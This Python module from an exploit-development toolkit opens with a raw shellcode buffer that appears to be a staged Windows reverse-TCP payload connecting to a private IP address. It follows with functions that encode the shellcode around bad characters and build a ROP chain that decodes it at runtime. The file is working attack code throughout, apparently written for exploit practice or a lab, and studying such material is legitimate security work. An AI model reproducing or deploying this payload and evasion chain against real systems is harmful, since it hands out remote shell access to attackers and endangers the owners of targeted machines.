buf = b""
buf += b"\xfc\xe8\x90\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"
buf += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a"
buf += b"\x24\xbf\x38\x44\x97\xed\x8b\x72\x28\x31\xc0\xac"
buf += b"\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
buf += b"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
buf += b"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x58"
buf += b"\x20\x01\xd3\x8b\x48\x18\x85\xc9\x74\x3a\x8b\x7d"
buf += b"\xf8\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1\xcf\x0d"
buf += b"\xac\x01\xc7\x38\xe0\x75\xf4\x3b\x7d\x24\x75\xe2"
buf += b"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58"
buf += b"\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
buf += b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
buf += b"\x12\xe9\x7f\xff\xff\xff\x5d\x68\x33\x32\x00\x00"
buf += b"\x68\x77\x73\x32\x5f\x54\x68\xed\x27\xf8\x18\x89"
buf += b"\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50"
buf += b"\x68\x2a\x12\xe3\xe3\xff\xd5\x6a\x0a\x68\xc0\xa8"
buf += b"\x12\x0c\x68\x02\x00\x27\x0f\x89\xe6\x50\x50\x50"
buf += b"\x50\x40\x50\x40\x50\x68\xeb\xa1\x56\xc4\xff\xd5"
buf += b"\x97\x6a\x10\x56\x57\x68\x12\x27\xfc\x93\xff\xd5"
buf += b"\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00"
buf += b"\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x23\x16\x48"
buf += b"\x1a\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40"
buf += b"\x68\x00\x10\x00\x00\x56\x6a\x00\x68\xf8\x54\x25"
buf += b"\xf7\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x23"
buf += b"\x16\x48\x1a\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\xc1\x6c\x4f\xb6"
buf += b"\xff\xd5\x57\x68\x7d\x7a\x57\x61\xff\xd5\x5e\x5e"
buf += b"\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff"
buf += b"\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xa6\xf3"
buf += b"\xe2\xdc\x6a\x00\x53\xff\xd5"

from struct import pack

from .util_module import log, checkBadChars, checkNullBytes, printBuffer
import sys


def getShellcode(encoded=False, bad_chars=None, debug=False):

    if not encoded:
        return buf

    if not bad_chars:
        log("No bad characters provided for encoding.", level="-")
        return buf, []
    elif 0x00 not in bad_chars:
        # Ensure 0x00 is the first bad character in the list
        bad_chars.insert(0, 0x00)
        log(f"Bad characters provided for encoding: {bad_chars}", level="*")

    bad_chars = set(bad_chars)
    encoded_shellcode = bytearray(buf)
    replacements = []

    try:
        for index, original in enumerate(encoded_shellcode):
            if original not in bad_chars:
                continue
            # Find a replacement byte that is not a bad character and has a safe correction value.

            for replacement in range(256):

                # Check if the replacement byte is a bad character
                if replacement in bad_chars:
                    continue

                # Calculate the correction value for the replacement byte
                correction = (original - replacement) & 0xFF

                # Check if the correction value is a bad character
                if correction in bad_chars:
                    continue

                # If we reach this point, we have found a valid replacement
                replacements.append({"index": index, "original": original, "replacement": replacement, "correction": correction})

                # Replace the original byte with the replacement byte in the encoded shellcode
                encoded_shellcode[index] = replacement

                # Log the current index
                if debug:
                    log(f"Processing byte at index {index}")

                break
            else:
                raise ValueError(f"No valid replacement found for byte 0x{original:02x} " f"at index {index}")

        if replacements:
            log(f"Replaced {len(replacements)} bad characters in shellcode.", level="*")

        if debug and replacements:
            log(f"Replacements:", level="o", indent=1)
            i = 1
            for rep in replacements:
                print(
                    f"\t\t[{i:02}] Index {rep['index']:03}: 0x{rep['original']:02x} -> 0x{rep['replacement']:02x} "
                    f"(correction: 0x{rep['correction']:02x})",
                )
                i += 1
    except ValueError as e:
        # Log the error and exit the program
        log(str(e), level="-")
        sys.exit(1)

    return bytes(encoded_shellcode), replacements


# def generateShellcodeDecoder(replacements, rop_pop_ecx, rop_sub_eax_ecx_pop_ebx, rop_add_ptrEAX_1_bh, debug=False):
#     """
#     Dynamically generates the ROP decoder chain using the replacements
#     dictionary generated by the getShellcode() encoder.
#     """
#     restoreRop = b""

#     for i in range(len(replacements)):
#         # Calculate relative offset from the previous replacement index
#         if i == 0:
#             offset = replacements[i]["index"]
#         else:
#             offset = replacements[i]["index"] - replacements[i - 1]["index"]

#         neg_offset = (-offset) & 0xFFFFFFFF

#         # Directly pull the exact correction value computed by the encoder
#         correction = replacements[i]["correction"]

#         # Shift into BH and apply the static XOR/OR template to avoid null bytes
#         value = (correction << 8) | 0x11110011

#         if debug:  # Assuming a global or passed debug flag
#             print(f"[*] ROP Fix [{i:02}]: Index {replacements[i]['index']:03} | Offset: {offset}:02 | Correction: 0x{correction:02x}")

#         # Build the ROP sequence for this specific bad character
#         restoreRop += rop_pop_ecx  # pop ecx ; ret
#         restoreRop += pack("<L", neg_offset)
#         restoreRop += rop_sub_eax_ecx_pop_ebx  # sub eax, ecx ; pop ebx ; ret
#         restoreRop += pack("<L", value)  # correction value lands in BH
#         restoreRop += rop_add_ptrEAX_1_bh  # add [eax+1], bh ; ret

#     # Test if the generated ROP chain contains any null bytes
#     if checkNullBytes(restoreRop):
#         log("Generated ROP chain contains null bytes. Please check the ROP gadgets and shellcode.", level="-")
#         sys.exit(1)

#     # Test if the generated ROP chain contains any bad characters
#     if checkBadChars(restoreRop, [0x00]):
#         log("Generated ROP chain contains bad characters. Please check the ROP gadgets and shellcode.", level="-")
#         sys.exit(1)

#     return restoreRop


def generateShellcodeDecoder(replacements, rop_pop_ecx, rop_sub_eax_ecx_pop_ebx, rop_add_ptrEAX_1_bh, debug=False):
    """
    Dynamically generates the ROP decoder chain using the replacements
    dictionary generated by the getShellcode() encoder.

    This uses relative offsets between consecutive bad-character positions,
    so each gadget pops an offset from the stack and applies it to EAX.
    The correction value is then added to [eax+1] (one byte after eax).
    """

    restoreRop = bytearray()

    for i in range(len(replacements)):
        # Calculate relative offset from the previous replacement index
        if i == 0:
            offset = replacements[i]["index"]
        else:
            offset = replacements[i]["index"] - replacements[i - 1]["index"]

        neg_offset = (-offset) & 0xFFFFFFFF
        correction = replacements[i]["correction"]
        value = (correction << 8) | 0x11110011

        if debug:
            log(
                f"[{i:02}] idx={replacements[i]['index']:03} rel_off={offset:#06x} neg_off={neg_offset:#010x} corr={correction:#04x}",
                indent=1,
                level="o",
            )

        # push the negative offset first, then pop it into ECX
        restoreRop += pack("<L", neg_offset)
        restoreRop += rop_pop_ecx  # pop ecx ; ret

        # sub eax,ecx; pop ebx
        restoreRop += rop_sub_eax_ecx_pop_ebx

        # correction value lands in BH
        restoreRop += pack("<L", value)

        # add [eax+1], bh
        restoreRop += rop_add_ptrEAX_1_bh

    # print the generated ROP chain in hex format and highlight any nullbytes/bad chars. if found stop program
    if debug:
        log("Shellcode Decoder ROP Chain :", level="+")
        printBuffer(restoreRop, width="dd")

    return bytes(restoreRop)
